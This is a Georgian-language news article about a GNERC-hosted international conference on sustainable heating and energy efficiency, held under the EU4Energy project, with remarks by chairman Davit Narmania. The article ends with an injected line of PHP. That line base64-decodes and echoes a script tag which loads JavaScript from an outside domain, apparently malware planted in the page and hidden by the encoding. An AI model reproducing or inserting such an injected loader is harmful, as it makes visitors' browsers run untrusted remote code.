celsiusi
ავერსი შნაიდერი

 საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელი ეროვნული კომისიის (სემეკ) თავმჯდომარემ, დავით ნარმანიამ მდგრადი გათბობისა და ენერგოეფექტურობის შესახებ ორდღიანი საერთაშორისო კონფერენცია გახსნა. სემეკის თავმჯდომარემ სიტყვით გამოსვლისას ისაუბრა ენერგეტიკის სექტორში საერთაშორისო თანამშრომლობის, ენერგოეფექტურობისა და მდგრადი გათბობის საკითხებზე, პარტნიორ ქვეყნებს შორის გამოცდილების გაზიარების მნიშვნელობაზე.

დავით ნარმანიამ აღნიშნა, რომ ენერგეტიკის სექტორში მნიშვნელოვანი ცვლილებები განხორციელდა ევროპული პრაქტიკისა და სტანდარტების დანერგვის კუთხით.

„სემეკთან არსებულ ენერგეტიკის სასწავლო ცენტრს ეძლევა შესაძლებლობა ევროკავშირის პროექტთან - EU4Energy-სთან ერთად უმასპინძლოს კონფერენციას მდგრადი გათბობისა და ენერგოეფექტურობის შესახებ. კონფერენცია შესაძლებლობას აძლევს მონაწილეებს განიხილონ ენერგოეფექტურობის საკითხები, თანამედროვე ტენდენციები, მარეგულირებელი ჩარჩოები და ხელი შეუწყონ ახალი მიდგომების დამკვიდრებას. საქართველო დიდ ყურადღებას ანიჭებს ენერგოეფექტურობის საკითხების სრულყოფას. მნიშვნელოვანია ენერგიის დაზოგვის, ენერგიის მიწოდების უსაფრთხოების, ენერგოდამოუკიდებლობის გაზრდა, ასევე ენერგეტიკულ ბაზარზე ენერგოეფექტიანობის გაუმჯობესების ხელშემშლელი დაბრკოლებების მაქსიმალურად აღმოფხვრა.

მნიშვნელოვანია ცენტრალური გათბობის მიმართულება, რასთან დაკავშირებითაც განსხვავებული მოთხოვნები და მიდგომები არსებობს სხვადასხვა ქვეყანაში, მათი კლიმატური პირობებიდან და პოლიტიკის სპეციფიკიდან გამომდინარე. გათბობის სისტემებს სათბურის გაზების ემისიაში დიდი წვლილი შეაქვს. რეგულაციებით, რომლებიც ხელს უწყობენ ენერგოეფექტიანობას და განახლებადი ენერგიის წყაროების გავრცელებას გათბობის სექტორში, შესაძლებელია მნიშვნელოვნად შემცირდეს ემისიები. ამასთანავე, საყურადღებოა, რომ ეფექტური გათბობის სისტემების საშუალებით მომხმარებელს შეუძლია დაზოგოს ენერგიაზე გადასახადები.

მარეგულირებელი ორგანოების პრეროგატივაა აღნიშნული მიმართულებით ეფექტიანი ღონისძიებების განხორციელება. მათ შორის, განახლებადი ენერგიის განვითარების ხელშეწყობა, შესაბამისი სტანდარტების შემუშავება, გამჭვირვალობისა და მომხმარებელთა ინფორმირებულობის ზრდა, სტანდარტებისა და რეგულაციების შესრულების მონიტორინგი“, - აღნიშნა დავით ნარმანიამ.

კონფერენციის მონაწილეებს სიტყვით მიმართეს საქართველოში ევროკავშირის წარმომადგენლობის განვითარებისა და თანამშრომლობის ხელმძღვანელმა ნიკოლას სენდროვიჩმა, ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს გენერალურმა მდივანმა მარა ბერზინამ, საქართველოს ეკონომიკისა და მდგრადი განვითარების სამინისტროს ენერგეტიკული პოლიტიკისა და საინვესტიციო პროექტების დეპარტამენტის უფროსმა ჯუბო ტურაშვილმა, სემეკთან არსებული ენერგეტიკის სასწავლო ცენტრის დირექტორმა ნუგზარ ბერიძემ.

საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელ ეროვნულ კომისიასთან (სემეკ) არსებული ენერგეტიკის სასწავლო ცენტრისა და ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს ორგანიზებით 15-16 აპრილს, ქ. თბილისში მდგრადი გათბობისა და ენერგოეფექტურობის შესახებ საერთაშორისო კონფერენცია იმართება. მასში მონაწილეობას იღებენ სემეკის, ეკონომიკისა და მდგრადი განვითარების სამინისტროს, ენერგეტიკის სექტორში მოქმედი ორგანიზაციების, არასამთავრობო სექტორის, ენერგეტიკის სასწავლო ცენტრისა და სხვადასხვა საერთაშორისო ორგანიზაციების ხელმძღვანელი პირები, ქართველი და უცხოელი ექსპერტები. კონფერენცია ტარდება ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს „აღმოსავლეთ პარტნიორობის ქვეყნებში სუფთა ენერგიებზე ტრანზაქციის ხელშეწყობის“ ევროკავშირის პროექტის EU4Energy-ს ფარგლებში. EU4ENERGY-ს ინიციატივა დაფინანსებულია ევროკავშირის მიერ 8.5 მილიონი ევროს ოდენობით და ერთობლივად ხორციელდება ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს (CEER), ენერგეტიკის საერთაშორისო სააგენტოს (IEA) და ენერგეტიკული გაერთიანების სამდივნოს (EnCS) მიერ.

190
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");